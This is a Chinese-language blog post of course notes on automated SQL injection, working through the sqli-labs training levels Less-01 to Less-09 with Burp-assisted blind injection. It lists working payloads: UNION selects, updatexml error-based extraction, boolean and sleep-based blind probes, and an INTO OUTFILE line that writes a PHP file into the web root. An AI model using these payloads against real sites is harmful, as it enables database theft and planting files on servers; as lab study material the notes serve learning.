[网络安全学习篇55]：SQL自动化注入

引言：我的系列博客[网络安全学习篇]上线了，小编也是初次创作博客，经验不足；对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙，其实看到目录有300多集的时候，讲道理，有点怂了，所以我就想到了通过写博客（课程笔记）的形式去学习它，虽然写博客会让我多花几倍的时间去学习它，但是当我完成一篇博客所获得的成就感和你们对于我的认同感，让我很满足，能够鼓励我一天天的坚持下去，也希望和我一起学习本期视频的"同道"们也能给一直坚持下去。我们大家一起加油。由于作者本身也是网络信息安全小白，大部分知识点都是初次接触，出现对其理解不深入，不完整，甚至也会出现错误有问题的地方，希望大家谅解、留言提出指正，同时也欢迎大家来找我一起交流学习！！！

 

往期博客：

第一阶段：

[网络安全学习篇1]：windowsxp、windows2003、windows7、windows2008系统部署（千峰网络安全视频笔记）

[网络安全学习篇24]：漏洞与木马（千峰网络安全视频笔记 p117-p118）

第二阶段：

[网络安全学习篇25]：初识Linux及简单命令

[网络安全学习篇32]：Linux脚本编写汇总及应用

第三阶段：

[网络安全学习篇33]：0基础带你入门python

[网络安全学习篇38]：基础环境搭建

[网络安全学习篇39]：HTML标签基础 常用的标签 表格

[网络安全学习篇42]：靶场环境搭建（ubuntu系统安装优化及vulhub安装）

[网络安全学习篇43]：PHP基础+变量 运算符 流程控制语句

[网络安全学习篇48]：JS 基础 函数 事件）

第四阶段：

[网络安全学习篇49]：渗透测试方法论

[网络安全学习篇50]：Web架构安全分析

[网络安全学习篇51]：信息收集

[网络安全学习篇52]：扫描技术

[网络安全学习篇53]：口令破解

[网络安全学习篇54]：SQL注入

[网络安全学习篇55]：SQL自动化注入（本篇）

下期博文：

[网络安全学习篇56]：XSS（一）

 

目录

 

自动化注入

半自动化

全自动

sqli-labs题库

Less-01

Less-02

Less-03

Less-04

Less-05

Less-06

Less-07

Less-08

Less-09

---

自动化注入

半自动化

burp

全自动

sqlmap

定制化脚本

 

sqli-labs题库

Less-01

字符型注入

单引号

?id=1

?id=1' and 1=2 union select 1,version(),3 --+

Less-02

数字型注入

?id=-2 union select 1,2,version()

 

Less-03

字符型注入

near ''1'') LIMIT 0,1' at line 1

')

?id=1') and 1=2 union select 1,2,version()--+

 

Less-04

字符型注入

")

?id=2") and 1=2 union select 1,2,version()--+

Less-05

没有回显，有报错

字符型注入

单引号

?id=3' and updatexml(1,concat(0x5e,version(),0x5e),1)--+

Less-06

没有回显，有报错

字符型注入

"

?id=1" and updatexml(1,concat(0x5e,(select version()),0x5e),1)--+

Less-07

没有回显，没有报错

经过代码审计

字符型注入

'))

?id=2')) union select 1,"",3 into outfile "c:\\phpstudy\\www\\1.php"--+

Less-08

没有回显，没有报错，有布尔类型状态

字符型注入

'

布尔盲注

半自动化注入

工具：bp

*得到数据库名长度

?id=2' and length(database())=2 --+

抓包

 

选择字典

start attack

 

得到数据库名的长度 8

 

*获取数据库名

?id=2' and ascii(substr(database(),1,1))=1--+

 

字典

第一个变量1-8

第二个变量1-128

start attack

 

Less-09

字符型注入，单引号

没有回显，没有报错，没有布尔类型状态，有延时

半自动化注入

*获取数据库长度

?id=1' and if(length(database())=1,sleep(5),1)--+

抓包

添加变量

 

字典 0-9

 

*获取数据库名

 

抓包

 

字典

变量1：1-8

变量2：1-128

 

获取成功

 

---

参考文献：

千峰网络信息安全开源课程